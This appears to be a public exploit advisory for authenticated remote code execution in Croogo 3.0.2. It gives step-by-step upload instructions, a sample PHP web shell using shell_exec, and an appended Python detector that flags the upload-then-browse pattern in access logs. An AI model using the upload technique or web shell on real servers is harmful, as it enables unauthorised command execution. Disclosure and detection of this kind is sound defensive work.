Vulnerability Discovered: 2021-12-06
Type: webapps
Platform: php
# Exploit Title: Croogo 3.0.2 - Remote Code Execution (Authenticated)
# Date: 05/12/2021
# Exploit Author: Deha Berkin Bir
# Vendor Homepage: https://croogo.org/
# Software Link: https://downloads.croogo.org/v3.0.2.zip
# Version: 3.0.2
# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3
==> Tutorial <==
1- Log in with your privileged account.
2- Go to the 'Attachments' section; its path is '/admin/file-manager/attachments'.
3- Click the 'New Attachment' button.
4- Choose a malicious PHP script and upload it.
########### EXAMPLE SOURCE CODE OF MALICIOUS PHP SCRIPT ####################
<?php
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";
?>
############################################################################
5- Click on the URL of the malicious PHP script you uploaded.
6- The malicious PHP script is executed by the server.
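A defender-side check for the upload-then-browse sequence described above, added here as an example and not part of the original advisory: it scans Apache access-log lines for requests to server-side-executable files under the attachment path and raises severity when the same client posted to the attachment UI beforehand. The '/uploads/' serving prefix and the log lines are assumptions constructed for this example; only '/admin/file-manager/attachments' comes from the advisory.

```python
import re
from typing import Dict, List

# Constructed Apache access-log lines for illustration (not from the advisory).
# /admin/file-manager/attachments is the upload UI named above; the /uploads/
# prefix where served attachments land is an assumption made for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Dec/2021:10:01:40 +0000] "POST /admin/file-manager/attachments HTTP/1.1" 302 0
10.0.0.5 - - [06/Dec/2021:10:02:03 +0000] "GET /uploads/cmd.php HTTP/1.1" 200 2210
10.0.0.9 - - [06/Dec/2021:10:05:00 +0000] "POST /admin/file-manager/attachments HTTP/1.1" 302 0
10.0.0.9 - - [06/Dec/2021:10:05:30 +0000] "GET /uploads/report.pdf HTTP/1.1" 200 88000
10.0.0.7 - - [06/Dec/2021:10:06:10 +0000] "GET /uploads/shell.phtml HTTP/1.1" 404 210
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_UI = "/admin/file-manager/attachments"   # from the advisory
SERVED_PREFIX = "/uploads/"                      # assumption for this example
EXEC_EXTS = (".php", ".phtml", ".php3", ".php5", ".phar")


def detect_uploaded_php(log_text: str) -> List[Dict[str, str]]:
    """Flag GET/other requests for executable files under the attachment path.

    Severity is 'high' when the requesting client already POSTed to the
    attachment UI earlier in the log and the file was served with 200,
    i.e. the upload-then-browse sequence; otherwise 'medium'."""
    uploaders = set()
    findings: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined/common log format
        ip, method, status = m["ip"], m["method"], m["status"]
        path = m["path"].split("?", 1)[0]
        if method == "POST" and path.startswith(UPLOAD_UI):
            uploaders.add(ip)
        elif path.startswith(SERVED_PREFIX) and path.lower().endswith(EXEC_EXTS):
            high = ip in uploaders and status == "200"
            findings.append({"ip": ip, "path": path, "status": status,
                             "severity": "high" if high else "medium"})
    return findings


if __name__ == "__main__":
    for finding in detect_uploaded_php(SAMPLE_LOG):
        print(finding)
```

Any hit, even a 404, indicates someone is probing the attachment directory for a script; a 'high' finding paired with a 200 is the pattern from step 5 above and warrants pulling the uploaded file from the server for review.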